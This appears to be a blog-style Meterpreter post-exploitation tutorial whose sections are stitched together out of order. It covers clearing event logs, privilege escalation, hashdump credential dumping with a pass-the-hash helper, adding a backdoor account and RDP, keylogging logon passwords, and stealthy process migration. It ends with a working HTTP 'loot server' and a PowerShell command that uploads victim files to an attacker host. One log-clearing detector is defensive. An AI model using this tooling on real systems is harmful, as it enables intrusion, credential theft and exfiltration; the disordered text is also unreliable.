Meterpreter download file from victim

Wrapping up

There are many more commands, scripts and modules supported by Meterpreter, far more than we can cover in one blog post.

What's left to do is wrap up. One way to wrap up cleanly has already been shown in the previous chapters: scripts and modules often leave a revert script that undoes all the changes the script made on the target machine.

See for example the chapter on creating a new account. It may also be necessary to cover any tracks we left on the machine during the post-exploitation phase: the Windows event log records much of our activity there.
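The defender's view of that clean-up, as an added example that is not part of the original post: a Python scan over exported event records that flags the events Windows writes when a log is cleared (event ID 1102 in the Security log, 104 in the System log). The records are constructed for the example, and their field names (channel, event_id, time, account) are an assumption of this example, not a Windows export format.

```python
"""Added example: spot event-log clearing in exported Windows events.

Windows records the act of clearing a log: event ID 1102 in the Security
log ("The audit log was cleared") and 104 in the System log.  A monitored
host therefore does not forget an attacker who cleared the logs; it alerts.
The records below are constructed for this example, and the field names
(channel, event_id, time, account) are an assumption, not a Windows format.
"""
from datetime import datetime, timedelta

LOG_CLEAR_EVENTS = {
    ("Security", 1102): "Security log cleared",
    ("System", 104): "System or Application log cleared",
}

SAMPLE_EVENTS = [  # constructed sample, in the order the host emitted them
    {"channel": "Security", "event_id": 4624, "time": "2023-05-02T10:14:03", "account": "alice"},
    {"channel": "Security", "event_id": 4672, "time": "2023-05-02T10:14:03", "account": "SYSTEM"},
    {"channel": "Application", "event_id": 1000, "time": "2023-05-02T10:20:41", "account": "alice"},
    {"channel": "System", "event_id": 104, "time": "2023-05-02T10:31:07", "account": "SYSTEM"},
    {"channel": "System", "event_id": 104, "time": "2023-05-02T10:31:07", "account": "SYSTEM"},
    {"channel": "Security", "event_id": 1102, "time": "2023-05-02T10:31:08", "account": "SYSTEM"},
    {"channel": "System", "event_id": 7036, "time": "2023-05-02T10:35:00", "account": "SYSTEM"},
]


def find_log_clears(events):
    """Return every event that records a log being cleared, with a label."""
    hits = []
    for ev in events:
        label = LOG_CLEAR_EVENTS.get((ev["channel"], ev["event_id"]))
        if label:
            hits.append({**ev, "label": label})
    return hits


def find_clearev_bursts(events, window_seconds=30):
    """A wipe of Application, System and Security in one go shows up as several
    clear events by the same account within a few seconds.  Returns one tuple
    per burst: (account, time of first clear, number of clear events)."""
    hits = sorted(find_log_clears(events), key=lambda e: e["time"])
    bursts = []
    for ev in hits:
        t = datetime.fromisoformat(ev["time"])
        last = bursts[-1] if bursts else None
        if last and last["account"] == ev["account"] \
                and t - last["last_time"] <= timedelta(seconds=window_seconds):
            last["cleared"] += 1
            last["last_time"] = t
        else:
            bursts.append({"account": ev["account"], "first_time": ev["time"],
                           "cleared": 1, "last_time": t})
    # A single clear is worth a look; two or more in one window is the wipe pattern.
    return [(b["account"], b["first_time"], b["cleared"]) for b in bursts
            if b["cleared"] >= 2]


if __name__ == "__main__":
    for hit in find_log_clears(SAMPLE_EVENTS):
        print(hit["time"], hit["channel"], hit["event_id"], hit["label"], hit["account"])
    print("bursts:", find_clearev_bursts(SAMPLE_EVENTS))
```

Pointing this at real data means mapping the fields of whatever export you have (evtx, Sysmon, a SIEM) onto those four keys; the correlation, several clears by one account within seconds, is the fingerprint of a full wipe rather than routine log rotation.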

We can clear the event log with the clearev command, which wipes the Application, System and Security logs. Two caveats: clearev needs administrative privileges, and clearing a log is itself logged (event ID 1102 in the Security log, 104 in the System log), so on a monitored host it produces an alert rather than silence.

When running Meterpreter, it is possible to push the current session to the background and start a new session on a different target. This is done with the background command. When we have several shell and Meterpreter sessions running, we may need to interact with them all at once or individually.

In msfconsole, use the sessions command to display all active sessions; these can be shells, Meterpreter sessions, VNC, and so on. sessions -i <id> resumes a session and sessions -k <id> kills it. In the following example, the current Meterpreter session is sent to the background, after which we close it.

There are three types of payload modules in the Metasploit framework: singles, stagers and stages. Singles are payloads that are self-contained and completely standalone. Stagers are small payloads that set up the connection between the target and the attacker; stages are the larger payloads, such as Meterpreter, that a stager pulls down over that connection.

In Metasploit, the type of payload can be deduced from its name: a single joins its parts with underscores (windows/shell_reverse_tcp), while a staged payload separates stage and stager with a slash (windows/shell/reverse_tcp).

Deploying Meterpreter

In the article about Metasploit, we set up the EternalBlue exploit to work with the default shell stage as payload; to get Meterpreter instead, set the payload to a Meterpreter stage such as windows/x64/meterpreter/reverse_tcp before running the exploit.

Post-exploitation

Now that we have successfully executed the EternalBlue exploit and installed Meterpreter on the target system, we have many possibilities. The download command copies a file from the target to our machine: give it the remote path and, optionally, a local destination directory; upload does the reverse. Double the backslashes in Windows paths, since Meterpreter treats a single backslash as an escape character.

Privilege escalation

Depending on the exploit you used, you may find that your Meterpreter session only has limited user rights.

Fortunately Meterpreter has a getsystem command that tries several techniques (named-pipe impersonation and token duplication) to obtain local SYSTEM privileges. It needs a session that already has administrative rights or a token with SeImpersonatePrivilege; a medium-integrity session on a UAC-protected host has to bypass UAC first. The getuid command shows the user Meterpreter is running as, so run it before and after.

Execute a program

It is possible to execute an application on the target machine by running the execute command.

Options:
  -H  Create the process hidden from view
  -a  Arguments to pass to the command
  -i  Interact with the process after creating it
  -m  Execute from memory
  -t  Execute process with currently impersonated thread token
  -s  Execute process in a given session as the session user

Regarding the last option, -s, we can find out the available sessions with the enumdesktops command.

Harvest credentials

The hashdump command (also available as the post/windows/gather/hashdump module) dumps the local user accounts from the SAM database. It needs SYSTEM privileges, and each output line has the form user:RID:LM hash:NT hash:::.
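To show what to do with those hashdump lines, here is an added example (mine, not the post's): a parser for the pwdump format plus a triage pass over the result. The hashes are constructed, except for the two well-known constants for "no LM hash stored" and "empty password"; the pass-the-hash string it builds is the LMHASH:NTHASH form that Metasploit's psexec module accepts as SMBPass.

```python
"""Added example: triage the output of Meterpreter's hashdump.

Each line is user:RID:LM-hash:NT-hash::: (pwdump format).  The sample is
constructed for this example; the hash values are arbitrary apart from the
two well-known constants below.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" (LM of the empty string)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_backup:1002:11223344556677889900aabbccddeeff:0123456789abcdef0123456789abcdef:::
[*] some status line that is not a hash
"""


def parse_hashdump(text):
    """Parse pwdump-style lines; anything that does not match the format is skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid),
                            "lm": lm.lower(), "nt": nt.lower()})
    return entries


def triage(entries):
    """Return (account, finding) pairs a tester acts on first."""
    findings = []
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty password"))
        if e["lm"] != EMPTY_LM:
            # LM hashes are case-insensitive, 7-byte halves: crackable in minutes.
            findings.append((e["user"], "LM hash stored (crackable quickly)"))
        if e["rid"] == 500:
            findings.append((e["user"], "built-in Administrator (RID 500)"))
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            findings.append((",".join(users), "same password on several accounts"))
    return findings


def pth_credential(entry):
    """LMHASH:NTHASH, usable as SMBPass for pass-the-hash without cracking anything."""
    return f"{entry['lm']}:{entry['nt']}"


if __name__ == "__main__":
    entries = parse_hashdump(SAMPLE_HASHDUMP)
    for user, finding in triage(entries):
        print(f"{user}: {finding}")
    print("PtH for", entries[0]["user"], "->", pth_credential(entries[0]))
```

Password reuse between a local Administrator and a service account is the finding that usually matters most, since the same NT hash often works on every host where that image was deployed.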

Create a new account

A lot less stealthy is the creation of a new user account on the target machine. Adding a new account is done by calling the getgui script and providing the user name and password with the -u and -p options. Note the last line of the output, which points at a revert script. A screenshot of the target machine's logon screen shows why this fails as a stealthy approach: the new 'Hacker' account is plainly listed there.

Enable remote desktop

As soon as we have a new user with remote desktop rights, we can use these credentials to start a Remote Desktop session.

Adding the -e option makes the script enable Remote Desktop on the target and keep it enabled after a restart. Note in the last line of the output that this script also wrote a revert script to undo all the changes made on the target machine. Before starting the Remote Desktop session, we may want to check how long the user on the target has been idle with the idletime command. This reduces the risk of being discovered: on a Windows client a Remote Desktop logon disconnects any interactively logged-on user and shows them a prompt, so an active user would notice us at once. The image below shows the result of a successful Remote Desktop connection with the newly created 'Hacker' account.

Keylogging

Meterpreter can also be used to log keystrokes on the target machine, with the keyscan_start, keyscan_dump and keyscan_stop commands. The keylogger only sees input delivered to the process Meterpreter runs in, so migrate first into a process that receives the user's keystrokes, such as explorer.exe (or winlogon.exe to capture logon passwords).

Migrating to another process

Meterpreter can be attached to an existing process or started as a separate, new process. Migrating moves the session into another process, which hides it behind a legitimate process name and keeps it alive if the exploited process exits.

Hold my beer

First we want to know which processes are running on the target machine, using the ps command. To find out which process we are currently attached to, run the getpid command, then migrate <PID> to move into the chosen process. The target must have the same architecture (x86 or x64) as the current process, and unless we are elevated it must run as our user; after migrating, the session runs with the target process's token.

Once the exploit has run, the payload grants the attacker restricted or full access, depending on what the payload contains.
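For the migration step, an added example (not from the post) that parses a ps table like the one the migration section describes and picks a target the way a careful operator would: same architecture, same user unless elevated, and a long-lived process first. The table is constructed to match Meterpreter's column layout, and the list of preferred process names is an assumption.

```python
"""Added example: pick a process to migrate into from Meterpreter's ps output.

ps prints a whitespace-aligned table (PID PPID Name Arch Session User Path).
Migration fails across architectures and, without elevated rights, into a
process owned by another user; it also adopts that process's token.  The
chooser filters on those before preferring a long-lived process.  The table
is constructed for this example, laid out like Meterpreter's, and the list
of preferred process names is an assumption.
"""
import re

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"
PREFERRED = ("explorer.exe", "svchost.exe", "spoolsv.exe")   # assumption: stable hosts


def _row(pid, ppid, name, arch, sess, user, path):
    # Same layout as the real table: one leading space, columns padded with spaces.
    return f" {pid:<6}{ppid:<6}{name:<18}{arch:<6}{sess:<9}{user:<22}{path}".rstrip()


SAMPLE_PS = "\n".join([   # constructed sample output of `ps`
    "Process List",
    "============",
    "",
    _row("PID", "PPID", "Name", "Arch", "Session", "User", "Path"),
    _row("---", "----", "----", "----", "-------", "----", "----"),
    _row("0", "0", "[System Process]", "", "", "", ""),
    _row("4", "0", "System", "x64", "0", "", ""),
    _row("520", "4", "winlogon.exe", "x64", "0", SYSTEM_USER, r"C:\Windows\System32\winlogon.exe"),
    _row("884", "612", "svchost.exe", "x64", "0", SYSTEM_USER, r"C:\Windows\System32\svchost.exe"),
    _row("956", "612", "svchost.exe", "x64", "0", SYSTEM_USER, r"C:\Windows\System32\svchost.exe"),
    _row("2104", "2088", "explorer.exe", "x64", "1", r"WIN10\alice", r"C:\Windows\explorer.exe"),
    _row("2512", "2104", "notepad.exe", "x86", "1", r"WIN10\alice", r"C:\Windows\SysWOW64\notepad.exe"),
    _row("3020", "2104", "OneDrive.exe", "x86", "1", r"WIN10\alice", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    _row("3344", "2104", "payload.exe", "x64", "1", r"WIN10\alice", r"C:\Users\alice\Downloads\payload.exe"),
])


def parse_ps(text):
    """Parse the table by column offsets taken from the header line, so that
    values containing spaces (user names, paths) stay in one field."""
    lines = text.splitlines()
    hdr = next(i for i, l in enumerate(lines) if l.split()[:2] == ["PID", "PPID"])
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[hdr])]
    procs = []
    for line in lines[hdr + 2:]:          # skip the header and the dashes line
        if not line.strip():
            continue
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        if row["PID"].isdigit():
            row["PID"], row["PPID"] = int(row["PID"]), int(row["PPID"])
            procs.append(row)
    return procs


def choose_migration_target(procs, current_pid, preferred=PREFERRED):
    """Return the best process to `migrate` into, or None if nothing safe exists."""
    me = next(p for p in procs if p["PID"] == current_pid)
    elevated = me["User"] == SYSTEM_USER
    candidates = [p for p in procs
                  if p["PID"] != current_pid
                  and p["Arch"] == me["Arch"]                     # x86<->x64 migration fails
                  and (elevated or p["User"] == me["User"])]    # crossing users needs SYSTEM
    # Prefer our own user's processes even when SYSTEM: migrating into another
    # user's process hands us that user's token, not the one we escalated to.
    same_user = [p for p in candidates if p["User"] == me["User"]]
    for pool in (same_user, candidates):
        for name in preferred:
            for p in pool:
                if p["Name"].lower() == name:
                    return p
    return None


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for pid in (3344, 3020, 884):
        print(pid, "->", choose_migration_target(procs, pid))
```

When the chooser returns None, as it does for the x86 OneDrive process in the sample, the honest options are to migrate into a less ideal same-architecture process or to spawn one with execute -H and migrate into that.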

To elaborate on how payloads work, we must discuss their types, of which there are three. Singles are completely self-contained: a single can be as basic as a payload that adds a user account to the target system, with nothing further to download.

Stagers are small payloads whose job is to set up the network connection between the victim and our machine, for example by connecting back to us. Once a stager is running on the target, it downloads the stage over that connection and hands control to it.

Stages are the payloads the stager downloads, such as Meterpreter; since they arrive over the connection instead of inside the exploit, they are not limited by the amount of code the exploit can deliver. You can work out the type of a payload from its name.

First of all, start the Metasploit console by running msfconsole in the Kali terminal window. We will begin by setting up the EternalBlue exploit. I must emphasize that these techniques should only be used for legitimate purposes, either on a test network or in a penetration test for which you have written permission from the data owner.

You are accountable for your actions; make sure that everything you do is ethical, and use these techniques for good purposes. We will skip the exploitation phase in these examples to focus on the post-exploitation and data collection aspects.

So, we have exploited a system and find ourselves at the friendly Meterpreter console prompt.

Posted by Ben

SCP

We will use the scp utility to transfer the file from the victim machine to ours. This needs an SSH server on the victim and a password or key for it, so it mostly applies to Linux targets; the methods below are for Windows.

HTTP

With this method we host the file with Python's built-in http.server module (any other web server would do, but this one is the simplest), then fetch it on the victim with the DownloadFile method of PowerShell's System.Net.WebClient. Compare the file's hash on both ends: a download that is cut short still leaves a file behind.

Certutil

certutil.exe is designed to manage and download certificates, but as we saw in this post it can be used for more, including pulling an arbitrary file over HTTP. It is well known to defenders, so expect the download to be flagged.

Netcat

This method is similar to the one used with netcat on Linux. To transfer a file this way we need a netcat binary built for Windows on the victim, since Windows ships none.

FTP

Windows has an FTP client (ftp.exe) pre-installed, so we connect to an FTP server on our machine and download the desired file. Our shell may not be interactive, so we put the FTP commands in a text file and pass it to the client with the -s option.

SMB

With impacket-smbserver we share a folder on our machine, access it from the victim machine and copy the file from the share.

Transferring files from the victim to our machine

FTP

With this method we again start a temporary FTP server in the folder where our file is located, this time with write permission, then connect from the victim and upload the file.

Netcat

This method is the reverse of the netcat download: the listener on our machine writes to a file and the victim pushes the file into the connection.

SMB

With impacket-smbserver we share a folder on our machine (the server runs on the attacking machine), access it from the victim and copy the file to be exfiltrated into the share.

Powercat

In this method we load the powercat module into memory, a PowerShell tool with which we can open a shell and send files.
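To close the HTTP methods above, an added example that is not from the original post: a Python server that serves files to the victim with GET as python -m http.server does, and additionally accepts PUT uploads from the victim, storing them under their basename only and answering with a SHA-256 so the transfer can be verified. The bind address, port and file names are assumptions for the example.

```python
"""Added example (not from the original post): a two-way HTTP loot server.

python -m http.server only serves files (attacker -> victim).  This one also
accepts PUT uploads (victim -> attacker) into the same directory and reports a
SHA-256 for every upload, so both ends can check the transfer was complete.
Host, port and the file names below are assumptions for the example.
"""
import functools
import hashlib
import http.server
import os
import tempfile
import threading
import urllib.request


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


class LootHandler(http.server.SimpleHTTPRequestHandler):
    """GET: serve files from `directory` (download to the victim).
    PUT: store the request body in `directory` (upload from the victim)."""

    def do_PUT(self):
        # Keep only the basename: a client must not be able to write outside
        # the loot directory with a path such as /../../etc/cron.d/x.
        name = os.path.basename(self.path.split("?", 1)[0].rstrip("/"))
        if not name:
            self.send_error(400, "missing file name")
            return
        body = self.rfile.read(int(self.headers.get("Content-Length", "0")))
        with open(os.path.join(self.directory, name), "wb") as f:
            f.write(body)
        digest = sha256_bytes(body)
        self.log_message("stored %s (%d bytes) sha256=%s", name, len(body), digest)
        reply = (digest + "\n").encode()
        self.send_response(201)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)


def start_server(directory, host="0.0.0.0", port=8000):
    """Serve `directory` in a background thread; returns the server object."""
    handler = functools.partial(LootHandler, directory=directory)
    httpd = http.server.ThreadingHTTPServer((host, port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def upload(url, data):
    """The victim side of an upload (what curl -T or Invoke-WebRequest -Method Put
    -InFile do); returns the digest the server reports."""
    req = urllib.request.Request(url, data=data, method="PUT")
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode().strip()


def download(url):
    """The victim side of a download (what WebClient.DownloadFile does)."""
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def round_trip(directory=None):
    """Loopback demonstration: PUT a constructed file, GET it back, hash everything."""
    directory = directory or tempfile.mkdtemp(prefix="loot-")
    httpd = start_server(directory, "127.0.0.1", 0)     # port 0: pick a free port
    host, port = httpd.server_address[:2]
    base = f"http://{host}:{port}"
    try:
        sample = b"constructed sample loot: " + bytes(range(256))   # constructed payload
        reported = upload(f"{base}/secrets.bin", sample)
        fetched = download(f"{base}/secrets.bin")
        return {
            "sent": sha256_bytes(sample),
            "reported": reported,
            "stored": sha256_file(os.path.join(directory, "secrets.bin")),
            "fetched": sha256_bytes(fetched),
            "size": len(fetched),
        }
    finally:
        httpd.shutdown()
        httpd.server_close()


if __name__ == "__main__":
    srv = start_server(os.getcwd())
    print("serving", os.getcwd(), "on", srv.server_address)
    threading.Event().wait()    # run until Ctrl-C
```

From a Windows victim the upload is Invoke-WebRequest -Uri http://<attacker>:8000/secrets.bin -Method Put -InFile C:\path\secrets.bin (or curl -T on a host that has it); compare the digest it returns with Get-FileHash of the original. round_trip() runs the whole exchange on the loopback interface so the behaviour can be checked before it is used on an engagement.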
